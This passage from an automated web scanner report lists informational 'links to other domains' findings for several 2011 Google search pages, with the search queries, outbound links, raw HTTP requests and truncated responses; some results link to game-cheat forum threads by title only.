...[SNIP]...
<br><a href="http://www.elitepvpers.com/forum/shaiya-hacks-bots-cheats-exploits/432469-pre-release-shaiya-packet-bot-lilprohacker.html" onmousedown="return rwt(this,'','','','2','AFQjCNHW4vEanp-4quTyLIUl5lnI897yZw','','0CCEQrAIoATAB')">[Pre-Release] Shaiya Packet Bot By lilprohacker</a>
...[SNIP]...
<br><a href="http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/250645-uco-projects-thread-conquer-exe-itemtype-dat-5162-a-26.html" onmousedown="return rwt(this,'','','','2','AFQjCNGAXGiG_jVBIonlZd0F-hzOlSuEKQ','','0CCIQrAIoAjAB')">UCO Projects Thread (Conquer.exe, Itemtype.dat) [5162] - Page 26</a>
...[SNIP]...
<br><a href="http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/69124-speed-zoom-hack-non-dc-always-updated-13.html" onmousedown="return rwt(this,'','','','2','AFQjCNE2mnsOyd_vqgXWA8lQhgdk70GqMQ','','0CCMQrAIoAzAB')">Speed+Zoom Hack Non Dc Always Updated - Page 13</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/system.web.ui.webcontrols.listcontrol.selectedvalue(v=vs.85).aspx" class=l onmousedown="return rwt(this,'','','','3','AFQjCNF3DqVy4PBOuybpxXWs9AipfOk91w','','0CCkQFjAC')">ListControl.SelectedValue Property (System.Web.UI.WebControls)</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6BkuugxiAe0J:msdn.microsoft.com/en-us/library/system.web.ui.webcontrols.listcontrol.selectedvalue(v%3Dvs.85).aspx+%22ArgumentOutOfRangeException%22+exploit&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNFS8X8gVKfrYotWfTUpGtfBsQqFEw','','0CCsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cheatingnetwork.net/forums/public-bot-exploit-releases/74342-release-adf-ly-auto-clicker.html" class=l onmousedown="return rwt(this,'','','','4','AFQjCNFMC1pos3m3PDD3BPydaYYF83nAFw','','0CCwQFjAD')">[Release] Adf.ly Auto clicker</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:q0PrvCtmHjoJ:cheatingnetwork.net/forums/public-bot-exploit-releases/74342-release-adf-ly-auto-clicker.html+%22ArgumentOutOfRangeException%22+exploit&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNFHe6XbTBhHMIdzKPP1xBr948gv9Q','','0CC4QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cheatingnetwork.net/forums/gomez-peer-zone/58456-gomez-peer-zone-exploit-enhancer-5.html" class=l onmousedown="return rwt(this,'','','','5','AFQjCNE_UUuDYKNoYzyKZ0Gihq5u9MUdVQ','','0CC8QFjAE')">Gomez Peer Zone <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FP2V-312bG4J:cheatingnetwork.net/forums/gomez-peer-zone/58456-gomez-peer-zone-exploit-enhancer-5.html+%22ArgumentOutOfRangeException%22+exploit&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNF_ZCnaImzarprxwQOUMkOlJt-epQ','','0CDEQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.codeproject.com/KB/edit/AvalonEdit.aspx?msg=3466323" class=l onmousedown="return rwt(this,'','','','6','AFQjCNGgCXzy24qu59UIztXgwAz4oEqOZA','','0CDMQFjAF')">Using AvalonEdit (WPF Text Editor) - CodeProject</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rr93tRmoz3EJ:www.codeproject.com/KB/edit/AvalonEdit.aspx%3Fmsg%3D3466323+%22ArgumentOutOfRangeException%22+exploit&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNGNFhfsGlAqaREX9Tkv1E5cvHfZCg','','0CDgQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://reflector.webtropy.com/default.aspx/Net/Net/3@5@50727@3053/DEVDIV/depot/DevDiv/releases/Orcas/SP/wpf/src/Core/CSharp/MS/Internal/MemoryPressure@cs/1/MemoryPressure@cs" class=l onmousedown="return rwt(this,'','','','7','AFQjCNE7wZ-M8cwHvrmjUOyyUFYO82sBVg','','0CDkQFjAG')">MemoryPressure.cs source code in C# .NET</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-y47Wab7JbAJ:reflector.webtropy.com/default.aspx/Net/Net/3%405%4050727%403053/DEVDIV/depot/DevDiv/releases/Orcas/SP/wpf/src/Core/CSharp/MS/Internal/MemoryPressure%40cs/1/MemoryPressure%40cs+%22ArgumentOutOfRangeException%22+exploit&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNHWP5m_-6Rjkt5QxHN4Q0uKCnBmFg','','0CDsQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ffxiscripting.com/viewtopic.php?p=31019" class=l onmousedown="return rwt(this,'','','','8','AFQjCNG6TRHr38Li9Msry4qh6l85ISDimQ','','0CDwQFjAH')">Post - ffxiscripting MMORPG Bots Macros Hacks <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6MrK-KHcjs0J:www.ffxiscripting.com/viewtopic.php%3Fp%3D31019+%22ArgumentOutOfRangeException%22+exploit&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNGykcDRUSmRCbDK37OcpQHW65C78Q','','0CEAQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elitepvpers.de/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html" class=l onmousedown="return rwt(this,'','','','9','AFQjCNF8RgG9GkY2HN1wmoCgM3RP2FmaYA','','0CEEQFjAI')">CO Memory Tool... - Page 3</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mvzPMW8Q5ScJ:www.elitepvpers.de/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html+%22ArgumentOutOfRangeException%22+exploit&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNFmfhfA1eKhrYsgKusdrAXCj8b4nQ','','0CEcQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://mikehofer.blogspot.com/2007/07/parameter-validation-framework.html" class=l onmousedown="return rwt(this,'','','','10','AFQjCNGqBaAK2C_789KubJ_qeHRrlc64lA','','0CEgQFjAJ')">Coding from the Trenches: A Parameter Validation Framework</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nniDTeL_5VAJ:mikehofer.blogspot.com/2007/07/parameter-validation-framework.html+%22ArgumentOutOfRangeException%22+exploit&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNEY5wJkGVqq_GtwHy3u_SYAtZhARw','','0CEoQIDAJ')">Cached</a>
...[SNIP]...

20.77. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=Server+Error+in+%27%2F%27+Application.--------------------------------------------------------------------------------startIndex+cannot+be+larger+than+length+of+string.Parameter+name%3A+startIndexDescription%3A+An+unhandled+exception+occurred+during+the+execution+of+the+current+web+request.+Please+review+the+stack+trace+for+more+information+about+the+error+and+where+it+originated+in+the+code.Exception+Details%3A+System.ArgumentOutOfRangeException%3A+startIndex+cannot+be+larger+than+length+of+string.Parameter+name%3A+startIndex%5C

The response contains the following link to another domain:

http://www.youtube.com/results?oe=UTF-8&gfns=1&q=Server+Error+in+%27/%27+Application.--------------------------------------------------------------------------------startIndex+cannot+be+larger+than+length+of+string.Parameter+name:+startIndexDescription:+An+unhandled+exception+occurred+during+the+execution+of+the+current+web+request.+Please+review+the+stack+trace+for+more+information+about+the+error+and+where+it+originated+in+the+code.Exception+Details:+System.ArgumentOutOfRangeException:+startIndex+cannot+be+larger+than+length+of+string.Parameter+name:+startIndex%5C&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=Server+Error+in+%27%2F%27+Application.--------------------------------------------------------------------------------startIndex+cannot+be+larger+than+length+of+string.Parameter+name%3A+startIndexDescription%3A+An+unhandled+exception+occurred+during+the+execution+of+the+current+web+request.+Please+review+the+stack+trace+for+more+information+about+the+error+and+where+it+originated+in+the+code.Exception+Details%3A+System.ArgumentOutOfRangeException%3A+startIndex+cannot+be+larger+than+length+of+string.Parameter+name%3A+startIndex%5C HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:35:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74403

<!doctype html><head><title>Server Error in '/' Application.--------------------------------------------------------------------------------startIndex cannot be larger than length of string.Pa
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?oe=UTF-8&gfns=1&q=Server+Error+in+%27/%27+Application.--------------------------------------------------------------------------------startIndex+cannot+be+larger+than+length+of+string.Parameter+name:+startIndexDescription:+An+unhandled+exception+occurred+during+the+execution+of+the+current+web+request.+Please+review+the+stack+trace+for+more+information+about+the+error+and+where+it+originated+in+the+code.Exception+Details:+System.ArgumentOutOfRangeException:+startIndex+cannot+be+larger+than+length+of+string.Parameter+name:+startIndex%5C&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...

20.78. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=Waterfront-media

The response contains the following links to other domains:

http://corporate.everydayhealth.com/
http://corporate.everydayhealth.com/about-eh-sites.aspx
http://corporate.everydayhealth.com/about-eh.aspx
http://corporate.everydayhealth.com/advertise-with-eh.aspx
http://corporate.everydayhealth.com/contact-eh.aspx
http://corporate.everydayhealth.com/in-the-news.aspx
http://corporate.everydayhealth.com/press-releases.aspx
http://paidcontent.org/article/419-revolution-health-waterfront-media-plan-merger-to-compete-with-webmd/
http://paidcontent.org/tag/waterfront-media/
http://webcache.googleusercontent.com/search?q=cache:6ttMAKuTRQAJ:www.southbeachdiet.com/sbd/publicsite/south-beach-diet-iphone-app.aspx+Waterfront-media&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:RMEBPek4Xc4J:www.crunchbase.com/company/waterfrontmedia+Waterfront-media&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:RXCFjIDWUWAJ:www.mmm-online.com/look-out-webmd-waterfront-media-to-merge-with-revolution-health/article/118736/+Waterfront-media&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZimqRv6PxMAJ:corporate.everydayhealth.com/about-eh.aspx+Waterfront-media&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:cdhKWzb2NHcJ:paidcontent.org/tag/waterfront-media/+Waterfront-media&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:jkjxXHVamKIJ:corporate.everydayhealth.com/+Waterfront-media&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:jt6O1nOMIlQJ:www.inc.com/inc5000/2009/company-profile.html%3Fid%3D200922660+Waterfront-media&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:sUcdNmYyV2AJ:www.indeed.com/cmp/Waterfront-Media+Waterfront-media&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:tT8Hgqih-1UJ:paidcontent.org/article/419-revolution-health-waterfront-media-plan-merger-to-compete-with-webmd/+Waterfront-media&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:waKP4vGo2u0J:www.jillianmichaels.com/iphone.aspx+Waterfront-media&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.crunchbase.com/company/waterfrontmedia
http://www.inc.com/inc5000/2009/company-profile.html?id=200922660
http://www.indeed.com/
http://www.indeed.com/cmp/Waterfront-Media
http://www.jillianmichaels.com/
http://www.jillianmichaels.com/iphone.aspx
http://www.mmm-online.com/look-out-webmd-waterfront-media-to-merge-with-revolution-health/article/118736/
http://www.revolutionhealth.com/
http://www.southbeachdiet.com/sbd/publicsite/south-beach-diet-iphone-app.aspx
http://www.webmd.com/
http://www.youtube.com/results?hl=en&q=Waterfront-media&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=Waterfront-media HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:19:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76417

<!doctype html><head><title>Waterfront-media - Google Search</title><script>window.google={kEI:"tuYlTuabMaTb0QG_89HiCg",kEXPI:"17259,28505,29859,30316,30465,30727,31388,31406,31493",kCSI:{e:"17259,285
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?hl=en&q=Waterfront-media&um=1&ie=UTF-8&sa=N&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://corporate.everydayhealth.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHABxMIlzi-Z9-GYytDSaro2mdJUw','','0CBoQFjAA')">Everyday Health Homepage</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jkjxXHVamKIJ:corporate.everydayhealth.com/+Waterfront-media&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNF2vYFSu9bFZNxIovdqn5vSj6QdZA','','0CBwQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/contact-eh.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNGmaNIlR74g29PdDkenSCOenuFBsA','','0CB4QqwMoADAA')">Contact</a></div><div class=sld><a class=sla href="http://corporate.everydayhealth.com/about-eh.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNFk3pRjRewLcWpzyCuPlu1ZbYFKWg','','0CB8QqwMoATAA')">The Company</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/about-eh-sites.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHUfnkZqe5hBZBmP2t_kaUDjCGiog','','0CCAQqwMoAjAA')">Our Partners</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/press-releases.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNE8VNZ1aWNtx-CkiUBBd3hEuNT_nQ','','0CCEQqwMoAzAA')">Press Releases</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/in-the-news.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHRGvno_OaCCY2l6JBhID8DsnGA7w','','0CCIQqwMoBDAA')">News</a></div><div class=sld><a class=sla href="http://corporate.everydayhealth.com/advertise-with-eh.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHcEkApkmk7T4spTgZrLGFoFoeH6w','','0CCMQqwMoBTAA')">Advertise</a>
...[SNIP]...
<h3 class="r"><a href="http://corporate.everydayhealth.com/about-eh.aspx" class=l onmousedown="return rwt(this,'','','','2','AFQjCNFk3pRjRewLcWpzyCuPlu1ZbYFKWg','','0CCYQFjAB')">About Everyday Health</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZimqRv6PxMAJ:corporate.everydayhealth.com/about-eh.aspx+Waterfront-media&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNF4dhmHyCmHka0HlkGzqaja2wY4cw','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/company/waterfrontmedia" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFPWWe2R7mvY_kHjtc6iOyNfZoXmw','','0CCsQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RMEBPek4Xc4J:www.crunchbase.com/company/waterfrontmedia+Waterfront-media&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNEM7XsZcaXRWxmd2LkexMlq4SBvWw','','0CC8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://paidcontent.org/tag/waterfront-media/" class=l onmousedown="return rwt(this,'','','','4','AFQjCNHKaTSFHkmbCMIhpJmFrd_LAukW2g','','0CDIQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cdhKWzb2NHcJ:paidcontent.org/tag/waterfront-media/+Waterfront-media&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNFsA9b6PVRu7wOA3Hoyz2Q6eWnk-g','','0CDQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://paidcontent.org/article/419-revolution-health-waterfront-media-plan-merger-to-compete-with-webmd/" class=l onmousedown="return rwt(this,'','','','5','AFQjCNE2OfnVtA_BCcD3X9rX_atF54pTIQ','','0CDYQFjAE')">Revolution Health, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tT8Hgqih-1UJ:paidcontent.org/article/419-revolution-health-waterfront-media-plan-merger-to-compete-with-webmd/+Waterfront-media&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNF6iL7QUAGYI9SbF3QsnYTY117y2A','','0CDgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.inc.com/inc5000/2009/company-profile.html?id=200922660" class=l onmousedown="return rwt(this,'','','','6','AFQjCNHj8g-dh2jFtoDKX_GvdFYGj_tG9g','','0CDsQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jt6O1nOMIlQJ:www.inc.com/inc5000/2009/company-profile.html%3Fid%3D200922660+Waterfront-media&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNEPf12ntKGEWAjLFHw6MWc5S3jqbw','','0CD0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jillianmichaels.com/iphone.aspx" class=l onmousedown="return rwt(this,'','','','7','AFQjCNHaBYblRnzsNhwUij6B__fWfowMCg','','0CD8QFjAG')">Jillian Michaels's Fitness Motivation iPhone and iPod Touch App</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:waKP4vGo2u0J:www.jillianmichaels.com/iphone.aspx+Waterfront-media&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNFKuMg__Zk81J1aesXjUr6NQw6ASQ','','0CEEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mmm-online.com/look-out-webmd-waterfront-media-to-merge-with-revolution-health/article/118736/" class=l onmousedown="return rwt(this,'','','','8','AFQjCNF_Ex_m_i9aBZqw_ojJT_i8W4-2Ng','','0CEMQFjAH')">Look out WebMD: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RXCFjIDWUWAJ:www.mmm-online.com/look-out-webmd-waterfront-media-to-merge-with-revolution-health/article/118736/+Waterfront-media&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNGoRCai9GHEGuAUyYHAdBWn6hlqSA','','0CEcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.southbeachdiet.com/sbd/publicsite/south-beach-diet-iphone-app.aspx" class=l onmousedown="return rwt(this,'','','','9','AFQjCNFoGi4WmllpejDqo3AJMHt4KK_kOQ','','0CEkQFjAI')">South Beach Diet iPhone App</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6ttMAKuTRQAJ:www.southbeachdiet.com/sbd/publicsite/south-beach-diet-iphone-app.aspx+Waterfront-media&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNE9ecYZngwAybD2Q_OtMbF3GHy96Q','','0CEsQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Waterfront-Media" class=l onmousedown="return rwt(this,'','','','10','AFQjCNG1yn6JZbKpxAy4xjnYlflLSRTrKA','','0CE0QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sUcdNmYyV2AJ:www.indeed.com/cmp/Waterfront-Media+Waterfront-media&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNHt4MjEonKrsWO1DBtgkCWeWM0iBQ','','0CE8QIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.revolutionhealth.com/" class=l onmousedown="return rwt(this,'','','','11','AFQjCNFO-9-0Qw61wZZKYaIMrB1vGa7ZgQ','','0CFIQoggwCg')">Revolution Health</a>
...[SNIP]...
<div><a href="http://www.webmd.com/" class=l onmousedown="return rwt(this,'','','','12','AFQjCNENuYvN3HLTl1dStIa2f3Z4SANXJw','','0CFQQoggwCw')">WebMD</a>
...[SNIP]...
<div><a href="http://www.indeed.com/" class=l onmousedown="return rwt(this,'','','','13','AFQjCNECF5FqBLUYVpxl0tWDHV_9VTOmqQ','','0CFYQoggwDA')">Indeed</a>
...[SNIP]...
<div><a href="http://www.jillianmichaels.com/" class=l onmousedown="return rwt(this,'','','','14','AFQjCNE9-q0Yx3Qje_GspexwF9NTDSy72w','','0CFgQoggwDQ')">JillianMichaels.com</a>
...[SNIP]...

20.79. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bug+tracking

The response contains the following links to other domains:

http://elementool.com/
http://en.wikipedia.org/wiki/Bug_tracking_system
http://en.wikipedia.org/wiki/Comparison_of_issue-tracking_systems
http://ifdefined.com/bugtrackernet.html
http://webcache.googleusercontent.com/search?q=cache:7gOAt9acjMEJ:www.joelonsoftware.com/articles/fog0000000029.html+bug+tracking&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BpOeJlnhSWAJ:www.bugzilla.org/+bug+tracking&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:RWxCCvfaA5IJ:ifdefined.com/bugtrackernet.html+bug+tracking&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:TLmiE-hxiTUJ:www.mantisbt.org/+bug+tracking&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:bvCHZldW1GYJ:en.wikipedia.org/wiki/Comparison_of_issue-tracking_systems+bug+tracking&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:e9HBgjYvPmcJ:en.wikipedia.org/wiki/Bug_tracking_system+bug+tracking&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:gX0M89UF050J:www.fogcreek.com/fogbugz/+bug+tracking&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:iKyHH49TdB4J:www.debian.org/Bugs/+bug+tracking&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:mkv4Rdq2onwJ:www.atlassian.com/software/jira/solutions/bug-tracking.jsp+bug+tracking&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:pM6BltjZBlYJ:elementool.com/+bug+tracking&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.atlassian.com/software/jira/solutions/bug-tracking.jsp
http://www.bugzilla.org/
http://www.debian.org/Bugs/
http://www.fogcreek.com/fogbugz/
http://www.joelonsoftware.com/articles/fog0000000029.html
http://www.mantisbt.org/
http://www.youtube.com/results?q=bug+tracking&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=bug+tracking HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=bUlBHSw9RyrvSttR5U3rNRUYEyCIoOHEeyqLUjvZvJYsnwvg_xFWbDFu8wRsyPCX0JzpkjV16vXwqOAIqiLeg1KuBr3sTsQOG_a12u1qyWQimnfWv4FY2HkQyWm7z0tD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 105058

<!doctype html> <head> <title>bug tracking - Google Search</title> <script>window.google={kEI:"nJIlTtqnOYy10AGauejkCg",kEXPI:"17259,23756,24692,24878,24879,27400,28505,29702,29859,30316,30465,3
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=bug+tracking&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Bug_tracking_system" class=l onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CF0QFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:e9HBgjYvPmcJ:en.wikipedia.org/wiki/Bug_tracking_system+bug+tracking&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNHPz1EYo1ju9RwxQVsiL7O-2XBLlg','','0CGIQIDAA')">Cached</a>
...[SNIP]...
